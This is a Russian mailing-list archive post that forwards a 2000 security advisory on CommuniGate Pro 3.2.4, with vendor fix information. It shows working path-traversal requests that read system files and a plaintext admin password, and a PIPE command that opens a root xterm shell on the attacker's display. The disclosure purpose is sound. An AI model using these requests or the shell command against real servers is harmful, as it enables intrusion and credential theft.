Vulnerabilities in CommuniGate Pro v3.2.4

От: Boris Tyshkiewitch <bvt_at_mx_ru>
Дата: Tue 18 Jul 2000 - 11:35:44 MSD

  Если у кого стоит 3.2.4, то срочно удалите/переименуйте директорию Guide.

Boris.



This is a forwarded message
From: Lluis Mora <llmora@S21SEC.COM>
To: BUGTRAQ@SECURITYFOCUS.COM <BUGTRAQ@SECURITYFOCUS.COM> Date: Tuesday, July 18, 2000, 1:09:41 AM Subject: S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4

===8<==============Original message text===============

###############################################################
ID: S21SEC-003-en
Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4 Date: 03/04/2000
Status: Vendor contacted
Scope: Remote command execution as superuser Platforms: Linux, probably others
Author: llmora, fjserna
Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt Release: Public
###############################################################

                                S 2 1 S E C

                           http://www.s21sec.com

                Vulnerabilities in Stalker's CommuniGate Pro v3.2.4


About CommuniGate Pro


CommuniGate Pro is a feature-full commercial mail server (http://www.stalker.com/CommuniGatePro/).

It does SMTP message routing, provides POP, IMAP and HTTP access to mail, etc.

The CommuniGate Pro mail server has a built-in web server that allows users to read and send e-mail through the web, as well as allowing the administrator to remotely manage the mail server settings.

By default it opens port 8100/tcp for web users access to mail and port 8010/tcp for web management access.

Vulnerability description


  1. Reading any file in the mail server

CommuniGate provides a useful mapping to access the Web User Guide, which maps the URL /Guide/ to a directory in the CommuniGate sub tree. The built-in web server suffers of the well-known "../.." web server problem. If we request a document from the administrative web server /Guide/ mapping, using the "../.." technique, we get to see the file contents:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0

HTTP/1.0 200 OK
[... the /etc/motd file content is shown]

Connection closed by foreign host.
homer:~$

As CommuniGate runs as root and it doesn't drop any privileges, we are able to access any file in the system, e.g. /etc/shadow, ...

E.g., we can retrieve the postmaster/manager settings file, which includes the plaintext password to access the management website:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET
/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster. macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;} Connection closed by foreign host.
homer:~$

2. Remote execution of arbitrary commands as root

This is not a vulnerability in itself but a demonstration of what can be accomplished once an attacker has obtained the postmaster password.

Looking up the features of CommuniGate, we find the PIPE feature. It allows people to send e-mail to a program in the mail server. It's disabled by default, but once we can access the mail server settings using the postmaster password, we can just enable it, make the application directory be /usr/X11R6/bin/, increase the max. process execution time, and send an e-mail to "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe which will open a root xterm in our desktop...

Affected versions and platforms


This bug has been tested on the Linux (non-redhat & redhat) v3.2.4 (the latest stable release) distribution found at www.stalker.com. It has not been tested with other platforms or previous versions, though we strongly believe the bug is platform independent, and can probably be found and reproduced in previous releases.

Current beta versions (as from v3.3b2) don't suffer from this security problem.

Fix information


There is an upcoming stable release (v3.3) that will fix this problem, and currently the v3.3 betas (v3.3b2 or newer) are patched against this attack.

Upgrades are available from the vendor website at http://www.stalker.com.

Additional information


This vulnerability was found and researched by:

 Lluis Mora             llmora@s21sec.com
 Fermin J. Serna        fjserna@s21sec.com

You can find the latest version of this advisory at:

        http://www.s21sec.com/en/avisos/s21sec-003-en.txt

And other S21SEC advisories at http://www.s21sec.com/en/avisos/

===8<===========End of original message text===========

##################################################################
Вы получили это сообщение потому, что подписаны на список рассылки   <CGatePro@mx.ru>.
Чтобы отписаться, отправьте сообщение на адрес <CGatePro-off@mx.ru>
Чтобы переключиться в режим дайджеста - mailto:<CGatePro-digest@mx.ru>
Чтобы переключиться в индексный режим - mailto:<CGatePro-index@mx.ru>
Для административных запросов адрес <CGatePro-request@mx.ru> Получено Tue Jul 18 07:38:14 2000

Этот архив был сгенерирован hypermail 2.1.8 : Fri 24 Apr 2015 - 16:12:15 MSK